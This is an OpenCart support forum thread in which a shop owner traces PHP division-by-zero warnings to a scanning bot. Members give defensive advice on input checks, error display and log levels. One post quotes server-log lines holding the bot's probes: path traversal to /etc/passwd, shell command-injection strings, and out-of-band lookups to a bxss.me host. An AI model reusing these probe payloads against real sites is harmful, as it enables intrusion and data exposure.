Post by tiredman » Sat Jun 05, 2021 12:29 pm

Hello,
I'm running OC version 3.0.3.6 in the default theme
I'm wondering if you have a clue as to what's causing this. It suddenly keeps coming out, although I've seen it before, it runs once in a while, and not like now...:
In Error.log file as

Code: Select all

2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:16 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:16 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:16 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
Line 332 in category.php says:

Code: Select all

$data['results'] = sprintf($this->language->get('text_pagination'), ($product_total) ? (($page - 1) * $limit) + 1 : 0, ((($page - 1) * $limit) > ($product_total
- $limit)) ? $product_total : ((($page - 1) * $limit) + $limit), $product_total, ceil($product_total / $limit));


I have amended the category file at function index() to integer (int) the $page and $limit, like so:

Code: Select all

                if (isset($this->request->get['page'])) {
                        $page = (int)$this->request->get['page'];
                } else {
                        $page = 1;
                }

                if (isset($this->request->get['limit'])) {
                        $limit = (int)$this->request->get['limit'];
                } else {
                        $limit = $this->config->get('theme_' . $this->config->get('config_theme') . '_product_limit');
                }

This did not help. The errors kept appearing.
Please let me know if you have come across this and have a solution it.
Thanks! :-)
Last edited by tiredman on Wed Jun 09, 2021 11:26 pm, edited 1 time in total.

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by straightlight » Sat Jun 05, 2021 6:46 pm

Which PHP version?

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by tiredman » Mon Jun 07, 2021 7:18 am

Thanks.
"I'm running OC version 3.0.3.6 in the default theme".
As strangely as it suddenly appeared, it has stopped.
However, before due to the torrent of lines, a message appeared that says - the error.log file has exceeded some '5.8' Mb and stopped receiving new error lines. This within hours of clearing it.

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by Cue4cheap » Mon Jun 07, 2021 7:29 am

tiredman wrote:
Mon Jun 07, 2021 7:18 am
Thanks.
"I'm running OC version 3.0.3.6 in the default theme".
That is your OC version. He was asking your php version.
Mike

cue4cheap not cheap quality


Expert Member

Posts

Joined
Fri Sep 20, 2013 4:45 am

Post by ADD Creative » Mon Jun 07, 2021 4:57 pm

Something is using '&limit=0' (or something that PHP equates to 0) in a category URL.

You may be able to stop the log filling up by changing.

Code: Select all

if (isset($this->request->get['limit'])) {
To.

Code: Select all

if (!empty($this->request->get['limit'])) {
However, it could be another error causing the invalid limit value. Search you web access logs for &limit=0 and see what the referring page is. You could have some bad links on your site.

It could also be caused by a bot accessing values it shouldn't. So make sure display errors is switch off in all three places it needs to be.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by paulfeakins » Mon Jun 07, 2021 6:51 pm

tiredman wrote:
Sat Jun 05, 2021 12:29 pm

Code: Select all

.../catalog/controller/product/category.php
What's the full path?

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk


User avatar
Guru Member
Online

Posts

Joined
Mon Aug 22, 2011 11:01 pm
Location - London Gatwick, United Kingdom

Post by tiredman » Tue Jun 08, 2021 1:12 am

sorry it is.
Cue4cheap wrote:
Mon Jun 07, 2021 7:29 am
tiredman wrote:
Mon Jun 07, 2021 7:18 am
Thanks.
"I'm running OC version 3.0.3.6 in the default theme".
That is your OC version. He was asking your php version.
Mike
Oh! It is PHP 7.3.27 (cli) (built: Feb 9 2021 01:14:02) ( NTS )

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by tiredman » Tue Jun 08, 2021 1:34 am

I think this is it. In my web server error.log, thousands and thousands of lines like this, all from 1 IP address... :
2021/06/04 20:27:54 [error] 60066#101077: *4885441 open() "/directory/javax.faces.resource.../WEB-INF/web.xml.jsf" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /javax.faces.resource.../WEB-INF/web.xml.jsf HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:54 [error] 60066#101077: *4885526 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=1'" HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:54 [error] 60066#101077: *4885526 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=1%00%C0%A7%C0%A2%252527%252522 HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:54 [error] 60069#100986: *4885455 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=%40%40yMx8R HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:55 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=50%00 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=response.write(9061158*9577379) HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=echo%20wwgtuh%24()%5C%20kwruxn%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20wwgtuh%24()%5C%20kwruxn%5Cnz%5Exyu%7C%7Ca%20%23%7C"%20%26echo%20wwgtuh%24()%5C%20kwruxn%5Cnz%5Exyu%7C%7Ca%20%23 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=../../../../../../../../../../etc/passwd HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit='%2Bresponse.write(9061158*9577379)%2B' HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=%26echo%20haljhb%24()%5C%20htqvsy%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20haljhb%24()%5C%20htqvsy%5Cnz%5Exyu%7C%7Ca%20%23%7C"%20%26echo%20haljhb%24()%5C%20htqvsy%5Cnz%5Exyu%7C%7Ca%20%23 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=../../../../../../../../../../windows/win.ini HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit="%2Bresponse.write(9061158*9577379)%2B" HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=%7Cecho%20mrhwek%24()%5C%20mdmzmd%5Cnz%5Exyu%7C%7Ca%20%23'%20%7Cecho%20mrhwek%24()%5C%20mdmzmd%5Cnz%5Exyu%7C%7Ca%20%23%7C"%20%7Cecho%20mrhwek%24()%5C%20mdmzmd%5Cnz%5Exyu%7C%7Ca%20%23 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=50 HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=(nslookup%20hitwlhttyvfdwede1f.bxss.me%7C%7Cperl%20-e%20"gethostbyname('hitwlhttyvfdwede1f.bxss.me')") HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=../50 HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit= HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=50<esi:include%20src="http://bxss.me/rpb.png"/> HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:57 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server:….

He has left for now. ;D I don't think anything can be done to prevent this from happening again?... just one of those things you wished would go away forever.

Many thanks for your reply. I'll keep an eye out for the server error.logs from now.

Kind Regards
ADD Creative wrote:
Mon Jun 07, 2021 4:57 pm
Something is using '&limit=0' (or something that PHP equates to 0) in a category URL.

You may be able to stop the log filling up by changing.

Code: Select all

if (isset($this->request->get['limit'])) {
To.

Code: Select all

if (!empty($this->request->get['limit'])) {
However, it could be another error causing the invalid limit value. Search you web access logs for &limit=0 and see what the referring page is. You could have some bad links on your site.

It could also be caused by a bot accessing values it shouldn't. So make sure display errors is switch off in all three places it needs to be.

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by straightlight » Tue Jun 08, 2021 1:54 am

prouduct
This controller file does not exist in the OC core.

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by ADD Creative » Tue Jun 08, 2021 3:06 am

tiredman wrote:
Tue Jun 08, 2021 1:34 am
I think this is it. In my web server error.log, thousands and thousands of lines like this, all from 1 IP address... :

He has left for now. ;D I don't think anything can be done to prevent this from happening again?... just one of those things you wished would go away forever.
Block the IP in you hosting control panel if you haven't already. Although they will probably just change it later on.

Make sure display errors is switch off in the three places, as the error messages could reveal useful information to an attacker.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by tiredman » Tue Jun 08, 2021 7:27 pm

I changed it. It has my root folder with it, that I don't want to show. I'm dyslexic, I didn't realise that it was misspelled.
straightlight wrote:
Tue Jun 08, 2021 1:54 am
prouduct
This controller file does not exist in the OC core.

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by tiredman » Tue Jun 08, 2021 7:57 pm

ADD Creative wrote:
Tue Jun 08, 2021 3:06 am
tiredman wrote:
Tue Jun 08, 2021 1:34 am
I think this is it. In my web server error.log, thousands and thousands of lines like this, all from 1 IP address... :

He has left for now. ;D I don't think anything can be done to prevent this from happening again?... just one of those things you wished would go away forever.
Block the IP in you hosting control panel if you haven't already. Although they will probably just change it later on.

Make sure display errors is switch off in the three places, as the error messages could reveal useful information to an attacker.
All 3 were turned on. I went to turn them off, in php.ini, the system/config/default.php and in OC settings.
Thanks!

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by by mona » Wed Jun 09, 2021 7:54 pm

Code: Select all

Block the IP in you hosting control panel if you haven't already. Although they will probably just change it later on.
Correct, that is why ip blocking is futile.

These messages are in your web-server log because it cannot find the requested file/directory.

That means your loglevel is set too low, it will produce an error message in your log file whenever someone requests a resource you do not have.

I guarantee you that will happen often, not just from this ip but from thousands of other ips who are/will-be probing what you do have and in your case fill up your error log rapidly.

So check your web-server loglevel and set it higher if you can as these are not errors and should not be logged unless you are debugging.

LogLevel adjusts the verbosity of the messages recorded in the error logs (see ErrorLog directive). The following levels are available, in order of decreasing significance:

Level ------- Description ------- ------- Example
emerg ------- Emergencies - system is unusable. ------- ------- "Child cannot open lock file. Exiting”
alert ------- Action must be taken immediately. ------- ------- "getpwuid: couldn't determine user name from uid"
crit ------- Critical Conditions.------- ------- "socket: Failed to get a socket, exiting child”
error ------- Error conditions. ------- ------- "Premature end of script headers”
warn ------- Warning conditions. ------- ------- "child process 1234 did not exit, sending another SIGHUP"
notice ------- Normal but significant condition. ------- ------- "httpd: caught SIGBUS, attempting to dump core in ...”
info ------- Informational. ------- ------- "Server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers)..."
debug Debug-level messages ------- ------- "Opening config file ..."
trace1 ------- Trace messages ------- ------- "proxy: FTP: control connection complete"
trace2 ------- Trace messages ------- ------- "proxy: CONNECT: sending the CONNECT request to the remote proxy"
trace3 ------- Trace messages------- ------- "openssl: Handshake: start"
trace4 ------- Trace messages ------- ------- "read from buffered SSL brigade, mode 0, 17 bytes"
trace5 ------- Trace messages ------- ------- "map lookup FAILED: map=rewritemap key=keyname"
trace6 ------- Trace messages ------- ------- "cache lookup FAILED, forcing new map lookup"
trace7 ------- Trace messages, dumping large amounts of data------- ------- "| 0000: 02 23 44 30 13 40 ac 34 df 3d bf 9a 19 49 39 15 |"
trace8 Trace messages, dumping large amounts of data ------- ------- "| 0000: 02 23 44 30 13 40 ac 34 df 3d bf 9a 19 49 39 15 |"

DISCLAIMER:
You should not modify core files .. if you would like to donate a cup of coffee I will write it in a modification for you.


https://www.youtube.com/watch?v=zXIxDoCRc84


User avatar
Expert Member

Posts

Joined
Mon Jun 10, 2019 9:31 am

Post by straightlight » Wed Jun 09, 2021 8:06 pm

In the easiest scenario, if a situation is about solving log levels, better to contact your host at this point.

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by tiredman » Wed Jun 09, 2021 11:24 pm

I haven't given much thought to blocking IPs with this intentional way of causing errors – blocking them in an automatic way. I did an IP ban to those who tried to make an admin login attempt... the endpoint is fixed, so that was easy in some way. There was a period early this yr when > 100k failed attempts were made from a range of hundreds of unique IPs from all over. Some mastermind was using a 'dictionary' of usernames, from a to z, and then recycling it back... but it wasn't a manual attempt, so some bot was doing it for him because you can get as many as 30 tries in a minute.
With this style of causing errors, he is logging the error messages and mining for a loophole. I need to sort this out on the server OS level.
I'm hosting OC on my own *nix server... it takes care of server logs by 'rotation'. I gotta find an app that can track error.log entries of a certain type and fire a script to ban it.

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am

Post by ADD Creative » Wed Jun 09, 2021 11:54 pm

It's not just error message the bots look for it can be anything with the response.

If you only access your admin from a fixed or nearly fixed IP address. Make an allow list can be a simple option.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by tiredman » Thu Jun 10, 2021 12:09 am

It is open to all, but Iogins are "geo-allowed" in on submit.
So you think it would pointless to monitor?

New member

Posts

Joined
Mon Aug 06, 2018 1:11 am
Who is online

Users browsing this forum: No registered users and 416 guests